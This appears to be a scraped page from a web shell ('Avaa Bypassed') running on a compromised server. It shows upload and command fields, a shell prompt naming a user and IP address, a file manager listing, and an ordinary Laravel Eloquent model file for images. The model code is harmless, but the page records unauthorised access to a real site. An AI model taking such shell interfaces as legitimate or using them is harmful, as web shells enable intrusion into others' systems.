404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.17.165.235: ~ $
<?php

namespace App\Models;

use Carbon\Carbon;
use Illuminate\Database\Eloquent\Model;

/**
 * Class Image
 *
 * @property int $id
 * @property string $images
 * @property Carbon|null $created_at
 * @property Carbon|null $updated_at
 *
 * @package App\Models
 */
class Image extends Model
{
	protected $table = 'images';

	protected $fillable = [
		'images'
	];
}

Filemanager

Name Type Size Permission Actions
Admin.php File 955 B 0644
Image.php File 366 B 0644
NewsPodcasts.php File 299 B 0644
Reminder.php File 526 B 0644
User.php File 916 B 0644